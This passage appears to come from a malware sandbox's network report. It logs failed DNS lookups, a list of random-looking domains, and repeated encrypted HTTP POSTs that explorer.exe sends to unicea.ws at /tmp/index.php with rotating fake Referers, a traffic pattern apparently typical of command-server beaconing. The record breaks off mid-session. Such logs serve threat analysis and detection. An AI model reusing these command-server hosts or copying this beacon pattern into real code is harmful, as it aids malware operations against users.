                                            Oct 19, 2024 06:45:31.514403105 CEST1.1.1.1192.168.2.40x9ad2Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:31.534745932 CEST1.1.1.1192.168.2.40x1344Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:37.840265036 CEST1.1.1.1192.168.2.40xa13Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:37.855453968 CEST1.1.1.1192.168.2.40xde4aName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.967185974 CEST1.1.1.1192.168.2.40xc819Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.967202902 CEST1.1.1.1192.168.2.40xc819Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:43.985213995 CEST1.1.1.1192.168.2.40xc5beName error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:50.083595991 CEST1.1.1.1192.168.2.40xe383Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:50.850619078 CEST1.1.1.1192.168.2.40x2892Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.396687984 CEST1.1.1.1192.168.2.40xfde9Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.396701097 CEST1.1.1.1192.168.2.40xfde9Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:45:57.421417952 CEST1.1.1.1192.168.2.40x5711Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:46:05.385740995 CEST1.1.1.1192.168.2.40x78b4Name error (3)nwgrus.runonenoneA (IP address)IN (0x0001)false
                                            Oct 19, 2024 06:46:05.401643991 CEST1.1.1.1192.168.2.40xac92Name error (3)tech-servers.in.netnonenoneA (IP address)IN (0x0001)false
                                            • phdqgddkvvudcrt.org
                                              • unicea.ws
                                            • fnmiroofcti.org
                                            • irneakwnfjo.net
                                            • tbpxxwuuktsgi.com
                                            • lcmemwnyvfua.net
                                            • supcacejjlal.net
                                            • gfxdwdqexxrn.org
                                            • pcavojwgokxdrh.com
                                            • rjqbihcnrwkn.org
                                            • dchxksvmirnse.com
                                            • hhfxvhfrxxonmmed.com
                                            • qvjyoylilnetkk.org
                                            • qpewsiogiap.org
                                            • ogxfbekgdosi.com
                                            • tvtkflumbvrf.com
                                            • mlktwknksogej.net
                                            • rnhsdeqcuhv.net
                                            • potyjbnxqkwihrq.com
                                            • twhmygynknwaynw.org
                                            • vqovnajgvrg.net
                                            • iqalmqarlgoleo.com
                                            • manlfvrucld.net
                                            • bmtcjbsxoypbehg.org
                                            • hyntfrjgoodahxw.org
                                            • pfdeyqiftydbxp.net
                                            • oxhmmntuaoqjqw.com
                                            • jhatysyfpdjacrth.com
                                            • ekrrlfpmfkagxhov.net
                                            • mwurfcocxsehx.org
                                            • qjdqfxwyvfh.net
                                            • gwjmvpjprpa.net
                                            • hsokfaschfagb.org
                                            • yfwhugqkygknlega.net
                                            • clwlueiouwtdjlp.org
                                            • komfkwumjafaljeh.net
                                            • gkcfyfujfvjeukc.net
                                            • dsuiipbvrtqiui.net
                                            • cottwgkexhqi.com
                                            • tyhclxkbrciiuit.net
                                            • fdwyluiudrfobcvl.org
                                            • shybhbwsshpkm.net
                                            • ejvcjodbems.net
                                            • oilnmucjwyntrxl.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449736123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:42:25.014040947 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://phdqgddkvvudcrt.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 314
                                            Host: unicea.ws
                                            Oct 19, 2024 06:42:25.014059067 CEST314OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 4b c9 fc
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuvK UqX9K4~;p*h]n7"Y;E(%`#y@'qO])Z,o]3%7djU~p3peZd


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449926123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:31.092417955 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fnmiroofcti.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 211
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:31.092418909 CEST211OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 07 d6 98
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuC`Ty_Co}9>.~{kbriRYX1_&R;Tq]).}3k0FV65-BAlr


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449933123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:32.647191048 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://irneakwnfjo.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 119
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:32.647219896 CEST119OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 0b ed f9
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu&;j_*B}IHHbV


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449938123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:33.790662050 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tbpxxwuuktsgi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 128
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:33.790689945 CEST128OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 0b a1 ed
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuy.c6seFngi,9Fg


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449945123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:34.983871937 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://lcmemwnyvfua.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 279
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:34.983918905 CEST279OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 07 f8 e8
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu>DFylc]i`!bD0uP&CK Buq`Fz+`0'3\1U*XsOxFL\IJz


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449951123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:36.208466053 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://supcacejjlal.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 256
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:36.208488941 CEST256OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 1e b3 ee
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuommwbRD8to5H'=\ ;)B/@FMHrwdP{SiAZ,S@y^7]$4OgOV1a8`?J3$


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449957123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:37.387864113 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gfxdwdqexxrn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 264
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:37.387881994 CEST264OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 40 b9 f7
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuH@prPN5E#7:MblU<dAMqY*86SO#5*al|GEMX}D;(P7\.|Qm[)$_/$I`


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449968123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:39.080082893 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://pcavojwgokxdrh.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 127
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:39.080111027 CEST127OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 17 b7 a3
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vug(\zx"TSip;bD0QY


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.449978123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:40.273551941 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rjqbihcnrwkn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 323
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:40.273581982 CEST323OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 21 c1 9d
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuB!ycqL:## s[`I_;"ZLU[$O!_2|%R=Q~>`?a(eU4>WpaMH


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.449985123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:41.628854036 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dchxksvmirnse.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 270
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:41.628884077 CEST270OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 0a b6 91
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu|1}]tY~SR)*v"|^1n^GKVlU "+`U>*B0RvRH<E!KjdHLz02wmlE


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.449996123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:43.321141005 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://hhfxvhfrxxonmmed.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 299
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:43.321171045 CEST299OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 54 a1 8e
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuRT@PZ`goM"74$UxCY\ _VM;/dA\$ j=otSIQS5[Mic%dwd,p


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.450005123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:44.691551924 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://qvjyoylilnetkk.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 173
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:44.691591978 CEST173OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 42 d1 8d
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuB[ZzQ~:*=AI2C>P$f?2,w~u(K}3t*yM/


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.450012123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:45.857701063 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://qpewsiogiap.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 188
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:45.857701063 CEST188OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 23 c5 ae
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuO#i)isTHPUb.^jZtqb\C/^~INDtRGp\E[$Ruy


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.450015123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:47.257234097 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ogxfbekgdosi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 369
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:47.257234097 CEST369OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 22 ac 90
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuc"V\Z|`qC.6o)b`hPo2**K;Ey'3oJ)Im\Vuo02(<3HKG}%-]>9"k


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.450016123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:48.433176041 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tvtkflumbvrf.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 350
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:48.433207989 CEST350OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 4b d3 91
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu?K{@Qy`nXU'h#kYwo8SSR,^;~/Meml=eHh1NK'%sEDu9J?>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.450017123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:49.727139950 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mlktwknksogej.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 270
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:49.727173090 CEST270OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 52 ae bf
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu1RsNcDu%E9*fUi cgUR$'D]O>H_Jz^2"w4m9_!szWWdqF|5=]


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.450018123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:51.037252903 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rnhsdeqcuhv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 299
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:51.037280083 CEST299OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 41 bd a3
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vutAO0Px_"v+m{?hU37E&_7PCG(*"+%PLKGnhn"Q^W|CLT[icbPI/~


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.450019123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:52.821947098 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://potyjbnxqkwihrq.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 345
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:52.823015928 CEST345OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 33 d1 a9
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuH3WESSicQZVdlhrkFl"3M.</OZ!##O#C/S5(]4_MDPk!O3HlkX}UM$v


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.450020123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:54.417454004 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://twhmygynknwaynw.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 210
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:54.419017076 CEST210OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 52 bb f0
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuURD\z"pP3T+Sd?yx^vNJVze[>EO\cIZ=%%Fl!qa:oZ?


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.450021123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:55.959076881 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://vqovnajgvrg.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 116
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:55.959129095 CEST116OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5a a2 fc
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu;Zi2[E{eLPvd-C


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.450022123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:57.495244980 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://iqalmqarlgoleo.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 188
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:57.495289087 CEST188OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 4b b7 9c
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vusKl,Q_4T)qYXqn=D<~9Qj-d"d3HWd


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.450023123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:43:58.872142076 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://manlfvrucld.net/
